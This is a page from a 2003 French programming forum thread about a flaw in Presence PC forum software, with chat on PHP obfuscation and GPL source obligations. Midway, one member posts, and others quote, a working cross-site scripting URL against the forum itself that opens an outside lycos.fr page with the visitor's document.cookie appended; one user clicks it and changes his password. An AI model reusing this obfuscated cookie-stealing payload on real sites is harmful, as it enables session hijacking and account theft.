Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
906 connectés 

 


 Mot :   Pseudo :  
 
 Page :   1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17
Auteur Sujet :

La faille des forums presence pc enfin dévoilée!

n°596805
antp
Super Administrateur
Champion des excuses bidons
Posté le 25-12-2003 à 14:46:44  profilanswer
 

Reprise du message précédent :
Pas à ma connaissance


---------------
mes programmes ·· les voitures dans les films ·· apprenez à écrire
mood
Publicité
Posté le 25-12-2003 à 14:46:44  profilanswer
 

n°596806
nraynaud
lol
Posté le 25-12-2003 à 14:47:22  profilanswer
 

void_ppc a écrit :

c'est ca, mais je croyais qu'ils vendaient aussi le forum

auquel cas ça serait (au minimum) au client qu'ils doivent le filer, par contre, ils n'ont aucun controle sur ce qu'en fait le client.


---------------
trainoo.com, c'est fini
n°596808
void_ppc
Posté le 25-12-2003 à 14:48:52  profilanswer
 

nraynaud a écrit :

auquel cas ça serait (au minimum) au client qu'ils doivent le filer, par contre, ils n'ont aucun controle sur ce qu'en fait le client.


 
un obfuscateur php ca doit bien exister non ?

n°596812
fabien
Vive la super 5 !
Posté le 25-12-2003 à 14:55:03  profilanswer
 

void_ppc a écrit :


 
un obfuscateur php ca doit bien exister non ?

oui, mais on te dis qu'il est obligé de donner le code source a son client, donc il a pas le droit de le crypter.


Message édité par fabien le 25-12-2003 à 14:55:09
n°596815
void_ppc
Posté le 25-12-2003 à 14:58:02  profilanswer
 

fabien a écrit :

oui, mais on te dis qu'il est obligé de donner le code source a son client, donc il a pas le droit de le crypter.


 
par exemple si tu remplace tous les noms de tes variables par des hashs MD5 ou des notation binaires genre var001010101 par exemple, c'est illisible mais c'est pas vraiment crypté.
 
Est-ce qu'on peut parler de code crypté dans ce cas là ?

n°596819
joce
Architecte / Développeur principal
"BugHunter"
Posté le 25-12-2003 à 15:08:41  profilanswer
 
n°596821
void_ppc
Posté le 25-12-2003 à 15:12:10  profilanswer
 


 
merci
 
Ca serait possible de voir juste 2-3 lignes de ce que ca donne ?

n°596822
joce
Architecte / Développeur principal
"BugHunter"
Posté le 25-12-2003 à 15:13:05  profilanswer
 


<?php //00259
if(!extension_loaded('ionCube Loader')){$_ln='/ioncube/ioncube_loader.so';$_rd=str_repeat('/..',substr_count($_id=realpath(ini_get('extension_dir')),'/')).dirname(__FILE__).'/';$_i=strlen($_rd);while($_i--){if($_rd[$_i]=='/'){$_lp=substr($_rd,0,$_i).$_ln;if(file_exists($_id.$_lp)){$_ln=$_lp;break;}}}@dl($_ln);}if(function_exists('_il_exec')){return _il_exec();}die('The file <b>'.__FILE__.'</b> has been encoded with the <a href="http://ioncube.com/encoder/">ionCube PHP Encoder</a> and requires the free <a href="http://ioncube.com/loader/">ionCube PHP Loader</a> to be installed.');
 
?>
?(¼??ô?#_*n¤DAÿÁ9HÕÏøÚ£0ôäl?-bÁ9¬ô,úuI×#àÃl?AÿÁ9(ÿ8')º?zt#x?°ÉfÿÀ? sì?ä(?ÓEn_Æì} |EöÿLÏd&!$9CC?È??? Á
ÂT
Ò¤³?ÎFz!Ò ?Ö"­?Þ:?/±vë4=mê «?¬ÎæuÕÁVÀ6Ä°?éh
þRðóÁϤ?üeà/?øß?ÿ
øß?¿üåà/?ø+À_þJðW?¿üUà¯?ø«Á_


Message édité par joce le 25-12-2003 à 15:20:07
n°596826
void_ppc
Posté le 25-12-2003 à 15:19:09  profilanswer
 

ah ouai :D

n°596828
joce
Architecte / Développeur principal
&#034;BugHunter&#034;
Posté le 25-12-2003 à 15:20:18  profilanswer
 

ouais faut s'accrocher pour le decrypter :D

mood
Publicité
Posté le 25-12-2003 à 15:20:18  profilanswer
 

n°596832
*syl*
--&gt; []
Posté le 25-12-2003 à 15:25:18  profilanswer
 

Bah ça peut être très simple à décrypter si leur produit ne fait que renvoyer la page décryptée au module PHP..
Mais ça m'étonnerais qu'ils fonctionnent comme ça, PHP doit être intégré à leur truc pour éviter ça justement :ange:

n°596834
fabien
Vive la super 5 !
Posté le 25-12-2003 à 15:26:19  profilanswer
 

Joce a écrit :

ouais faut s'accrocher pour le decrypter :D

ben le serveur decrypte bien le source, donc il est possible de recuperer le code. Mais bon c pas a la porté de n'importe qui :D
 

n°596836
joce
Architecte / Développeur principal
&#034;BugHunter&#034;
Posté le 25-12-2003 à 15:27:45  profilanswer
 

"Turn PHP scripts into optimised and obfuscated compiled bytecode format with multilayer encoding."
 
déjà que de l'obfuscated c'est chaud, alors là j'aurais tendance à dire que c'est encore plus chaud


Message édité par joce le 25-12-2003 à 15:28:36
n°596840
nraynaud
lol
Posté le 25-12-2003 à 15:46:18  profilanswer
 

void_ppc a écrit :


 
par exemple si tu remplace tous les noms de tes variables par des hashs MD5 ou des notation binaires genre var001010101 par exemple, c'est illisible mais c'est pas vraiment crypté.
 
Est-ce qu'on peut parler de code crypté dans ce cas là ?

ça a clairement été désigné comme une violation de la GPL, le code source, c'est le code que manipule celui qui conçoit, pas une transformation de celui-ci.
 
Pour le cas de mldonkey le pb c'est posé.


---------------
trainoo.com, c'est fini
n°596854
fabien
Vive la super 5 !
Posté le 25-12-2003 à 16:51:30  profilanswer
 

Joce a écrit :

leur forum ressemble trop au mien, le pompage c'est mal :D
 

en tous cas, pour le url rewriting , t'as pompé sur eux :D

n°596855
joce
Architecte / Développeur principal
&#034;BugHunter&#034;
Posté le 25-12-2003 à 16:52:02  profilanswer
 

fabien a écrit :

en tous cas, pour le url rewriting , t'as pompé sur eux :D
 

:non: demande d'un client [:spamafote]

n°596857
antp
Super Administrateur
Champion des excuses bidons
Posté le 25-12-2003 à 16:53:29  profilanswer
 

fabien a écrit :

en tous cas, pour le url rewriting , t'as pompé sur eux :D
 


 
:non: chez eux même avec un faible équivalent du blueflag (une page "favoris" ) on ne se tape pas des moches URL [:ddr555]


Message édité par antp le 25-12-2003 à 16:53:36

---------------
mes programmes ·· les voitures dans les films ·· apprenez à écrire
n°596860
joce
Architecte / Développeur principal
&#034;BugHunter&#034;
Posté le 25-12-2003 à 16:57:26  profilanswer
 

antp a écrit :


 
:non: chez eux même avec un faible équivalent du blueflag (une page "favoris" ) on ne se tape pas des moches URL [:ddr555]

ouais mais d'un autre coté si t'es à la page 3 de forum1, que tu vas dans forum2 et que tu reviens dans forum1, ba tu reviens pas à la page 3 mais à la page 1 (en gros ca mémorise pas les paramêtres que t'avais quand tu retournes sur forum1)

n°596887
antp
Super Administrateur
Champion des excuses bidons
Posté le 25-12-2003 à 17:37:12  profilanswer
 
n°596892
gm_superst​ar
Appelez-moi Super
Posté le 25-12-2003 à 17:40:10  profilanswer
 


Pourquoi avoir le numéro de la page de la liste des sujets dans l'URL d'un sujet ? :heink:


---------------
Incongru : une FAQ abandonnée sur les Standards du Web - FAQ périmée de blabla@Prog
n°596897
fabien
Vive la super 5 !
Posté le 25-12-2003 à 17:44:00  profilanswer
 

tiens, joce corige aussi cette faille tant que tu y es :D
 
http://forum.hardware.fr/forum2.ph [...] t=#t596860

n°596901
*syl*
--&gt; []
Posté le 25-12-2003 à 17:48:37  profilanswer
 

Roooo, c'est bon ça :D

n°596905
gm_superst​ar
Appelez-moi Super
Posté le 25-12-2003 à 17:55:14  profilanswer
 
n°596912
ChamOis
Posté le 25-12-2003 à 18:05:33  profilanswer
 

[:le_pilote]


---------------
Hey! You wanna dance?
n°596921
Mr yvele
yvele n'est plus.
Posté le 25-12-2003 à 19:02:48  profilanswer
 

fabien>  [:extazaille]  
 
 
 [:xp1700]


---------------
yvele n'est plus.
n°596923
*syl*
--&gt; []
Posté le 25-12-2003 à 19:06:55  profilanswer
 

De la faute à Fabien...
 
hxxp://forum.hardware.fr/forum2.php3?post=43813%22%3E%3C/a%3E%3Cscript%3Es=String.fromCharCode(104)%2bString.fromCharCode(116)%2bString.fromCharCode(116)%2bString.fromCharCode(112)%2bString.fromCharCode(58)%2bString.fromCharCode(47)%2bString.fromCharCode(47)%2bString.fromCharCode(109)%2bString.fromCharCode(101)%2bString.fromCharCode(109)%2bString.fromCharCode(98)%2bString.fromCharCode(114)%2bString.fromCharCode(101)%2bString.fromCharCode(115)%2bString.fromCharCode(46)%2bString.fromCharCode(108)%2bString.fromCharCode(121)%2bString.fromCharCode(99)%2bString.fromCharCode(111)%2bString.fromCharCode(115)%2bString.fromCharCode(46)%2bString.fromCharCode(102)%2bString.fromCharCode(114)%2bString.fromCharCode(47)%2bString.fromCharCode(111)%2bString.fromCharCode(100)%2bString.fromCharCode(105)%2bString.fromCharCode(108)%2bString.fromCharCode(101)%2bString.fromCharCode(100)%2bString.fromCharCode(101)%2bString.fromCharCode(115)%2bString.fromCharCode(99)%2bString.fromCharCode(97)%2bString.fromCharCode(109)%2bString.fromCharCode(112)%2bString.fromCharCode(115)%2bString.fromCharCode(47)%2bString.fromCharCode(108)%2bString.fromCharCode(111)%2bString.fromCharCode(103)%2bString.fromCharCode(111)%2bString.fromCharCode(46)%2bString.fromCharCode(112)%2bString.fromCharCode(104)%2bString.fromCharCode(112)%2bString.fromCharCode(63)%2bString.fromCharCode(108)%2bString.fromCharCode(111)%2bString.fromCharCode(103)%2bString.fromCharCode(111)%2bString.fromCharCode(61);%0a%0dwindow.open(s%2bdocument.cookie);%3C/script%3E&cat=10&config=hardwarefr.inc&page=15&cache=&sondage=&owntopic=1&p=1&trash=&subcat=#t596860
 
viré pour pas qu'y en a qui cliquent dessus :pfff:


Message édité par *syl* le 25-12-2003 à 19:10:34
n°596924
Mr yvele
yvele n'est plus.
Posté le 25-12-2003 à 19:07:35  profilanswer
 

*syl* a écrit :

De la faute à Fabien...
 
url=http://forum.hardware.fr/forum2.php3?post=43813%22%3E%3C/a%3E%3Cscript%3Es=String.fromCharCode(104)%2bString.fromCharCode(116)%2bString.fromCharCode(116)%2bString.fromCharCode(112)%2bString.fromCharCode(58)%2bString.fromCharCode(47)%2bString.fromCharCode(47)%2bString.fromCharCode(109)%2bString.fromCharCode(101)%2bString.fromCharCode(109)%2bString.fromCharCode(98)%2bString.fromCharCode(114)%2bString.fromCharCode(101)%2bString.fromCharCode(115)%2bString.fromCharCode(46)%2bString.fromCharCode(108)%2bString.fromCharCode(121)%2bString.fromCharCode(99)%2bString.fromCharCode(111)%2bString.fromCharCode(115)%2bString.fromCharCode(46)%2bString.fromCharCode(102)%2bString.fromCharCode(114)%2bString.fromCharCode(47)%2bString.fromCharCode(111)%2bString.fromCharCode(100)%2bString.fromCharCode(105)%2bString.fromCharCode(108)%2bString.fromCharCode(101)%2bString.fromCharCode(100)%2bString.fromCharCode(101)%2bString.fromCharCode(115)%2bString.fromCharCode(99)%2bString.fromCharCode(97)%2bString.fromCharCode(109)%2bString.fromCharCode(112)%2bString.fromCharCode(115)%2bString.fromCharCode(47)%2bString.fromCharCode(108)%2bString.fromCharCode(111)%2bString.fromCharCode(103)%2bString.fromCharCode(111)%2bString.fromCharCode(46)%2bString.fromCharCode(112)%2bString.fromCharCode(104)%2bString.fromCharCode(112)%2bString.fromCharCode(63)%2bString.fromCharCode(108)%2bString.fromCharCode(111)%2bString.fromCharCode(103)%2bString.fromCharCode(111)%2bString.fromCharCode(61);%0a%0dwindow.open(s%2bdocument.cookie);%3C/script%3E&cat=10&config=hardwarefr.inc&page=15&cache=&sondage=&owntopic=1&p=1&trash=&subcat=#t596860]http://forum.hardware.fr/hardwarefr/Programmation/sujet-44607.htm[/url]


 
[:hotshot]


---------------
yvele n'est plus.
n°596925
R3g
fonctionnaire certifié ITIL
Posté le 25-12-2003 à 19:08:04  profilanswer
 

J'ai pas bien compris là... pourquoi il marche ce lien ?


---------------
Au royaume des sourds, les borgnes sont sourds.
n°596927
fabien
Vive la super 5 !
Posté le 25-12-2003 à 19:08:47  profilanswer
 

*syl* a écrit :

De la faute à Fabien...
 
http//forum.hardware.fr/forum2.php3?post=43813%22%3E%3C/a%3E%3Cscript%3Es=String.fromCharCode(104)%2bString.fromCharCode(116)%2bString.fromCharCode(116)%2bString.fromCharCode(112)%2bString.fromCharCode(58)%2bString.fromCharCode(47)%2bString.fromCharCode(47)%2bString.fromCharCode(109)%2bString.fromCharCode(101)%2bString.fromCharCode(109)%2bString.fromCharCode(98)%2bString.fromCharCode(114)%2bString.fromCharCode(101)%2bString.fromCharCode(115)%2bString.fromCharCode(46)%2bString.fromCharCode(108)%2bString.fromCharCode(121)%2bString.fromCharCode(99)%2bString.fromCharCode(111)%2bString.fromCharCode(115)%2bString.fromCharCode(46)%2bString.fromCharCode(102)%2bString.fromCharCode(114)%2bString.fromCharCode(47)%2bString.fromCharCode(111)%2bString.fromCharCode(100)%2bString.fromCharCode(105)%2bString.fromCharCode(108)%2bString.fromCharCode(101)%2bString.fromCharCode(100)%2bString.fromCharCode(101)%2bString.fromCharCode(115)%2bString.fromCharCode(99)%2bString.fromCharCode(97)%2bString.fromCharCode(109)%2bString.fromCharCode(112)%2bString.fromCharCode(115)%2bString.fromCharCode(47)%2bString.fromCharCode(108)%2bString.fromCharCode(111)%2bString.fromCharCode(103)%2bString.fromCharCode(111)%2bString.fromCharCode(46)%2bString.fromCharCode(112)%2bString.fromCharCode(104)%2bString.fromCharCode(112)%2bString.fromCharCode(63)%2bString.fromCharCode(108)%2bString.fromCharCode(111)%2bString.fromCharCode(103)%2bString.fromCharCode(111)%2bString.fromCharCode(61);%0a%0dwindow.open(s%2bdocument.cookie);%3C/script%3E&cat=10&config=hardwarefr.inc&page=15&cache=&sondage=&owntopic=1&p=1&trash=&subcat=#t596860]http://forum.hardware.fr/hardwarefr/Programmation/sujet-44607.htm[/url]

faut pas cliuqer, il veux recuperer vos cookies !
faut pas cliuqer, il veux recuperer vos cookies !
faut pas cliuqer, il veux recuperer vos cookies !
faut pas cliuqer, il veux recuperer vos cookies !
faut pas cliuqer, il veux recuperer vos cookies !
faut pas cliuqer, il veux recuperer vos cookies !
faut pas cliuqer, il veux recuperer vos cookies !


Message édité par fabien le 25-12-2003 à 19:13:02
n°596928
*syl*
--&gt; []
Posté le 25-12-2003 à 19:09:44  profilanswer
 

J'avais prévenu et y'en a qui cliquent dessus !! raaaa :pfff:

n°596929
Mr yvele
yvele n'est plus.
Posté le 25-12-2003 à 19:10:17  profilanswer
 

putain *syl* !!  :o  :o  :o  
 
 
 
espece d'enfoiré!  :o  
 
 
ps: moi j'ai pas cliqué! [:cupra]


Message édité par Mr yvele le 25-12-2003 à 19:10:40

---------------
yvele n'est plus.
n°596930
fabien
Vive la super 5 !
Posté le 25-12-2003 à 19:11:38  profilanswer
 

*syl* a écrit :

J'avais prévenu et y'en a qui cliquent dessus !! raaaa :pfff:

enleve ton post [:kiki]

n°596931
R3g
fonctionnaire certifié ITIL
Posté le 25-12-2003 à 19:12:15  profilanswer
 

*syl* a écrit :

viré pour pas qu'y en a qui cliquent dessus :pfff:  

Trop tard  :cry:  (quel con !)


---------------
Au royaume des sourds, les borgnes sont sourds.
n°596932
*syl*
--&gt; []
Posté le 25-12-2003 à 19:12:29  profilanswer
 

fabien a écrit :

enleve ton post [:kiki]

Bah j'l'ai vite édité stout

n°596934
*syl*
--&gt; []
Posté le 25-12-2003 à 19:15:09  profilanswer
 

r3g a écrit :

Trop tard  :cry:  (quel con !)

T'es le seul, t'es fier ? :D

n°596935
R3g
fonctionnaire certifié ITIL
Posté le 25-12-2003 à 19:16:20  profilanswer
 

*syl* a écrit :

T'es le seul, t'es fier ? :D

Ben au moins je suis le seul à avoir vu ce que ça fait  :kaola:


---------------
Au royaume des sourds, les borgnes sont sourds.
n°596936
fabien
Vive la super 5 !
Posté le 25-12-2003 à 19:16:44  profilanswer
 

r3g a écrit :

Trop tard  :cry:  (quel con !)

ben change vite ton mdp :D

n°596937
R3g
fonctionnaire certifié ITIL
Posté le 25-12-2003 à 19:17:14  profilanswer
 

fabien a écrit :

ben change vite ton mdp :D
 

Oui c'est le premier truc que j'ai fais.


---------------
Au royaume des sourds, les borgnes sont sourds.
n°596938
*syl*
--&gt; []
Posté le 25-12-2003 à 19:18:50  profilanswer
 

r3g a écrit :

Ben au moins je suis le seul à avoir vu ce que ça fait  :kaola:  

Ça : http://membres.lycos.fr/odiledescamps/logo.jpg

n°596939
R3g
fonctionnaire certifié ITIL
Posté le 25-12-2003 à 19:19:58  profilanswer
 

Oui mais à peu près quarante fois dans mon cas.


---------------
Au royaume des sourds, les borgnes sont sourds.
n°596940
*syl*
--&gt; []
Posté le 25-12-2003 à 19:24:33  profilanswer
 

R3g a écrit :

Oui mais à peu près quarante fois dans mon cas.

30x exactement [:aloy]

mood
Publicité
Posté le   profilanswer
 

 Page :   1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17

Aller à :
Ajouter une réponse
 

Sujets relatifs
[Linux] Tester la presence d'un fichierVérifier la présence d'un cookie dans une page appelée par un include.
[Java] déterminer la présence de certains caractères dans un Stringregexp: recherche la présence de n mots dans une chaine
faille de sécurité dans mon script PhpWebGalleryHacking et faille de sécurité MySQL, aidez-moi à me protéger.
[Divers] C combien un forum Présence PC ?Recherche présence d'une variable
Certains Webmasters ont la tête dans les nuages... Faille inside[Java] Détecter la présence du JRE de Sun
Plus de sujets relatifs à : La faille des forums presence pc enfin dévoilée!


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR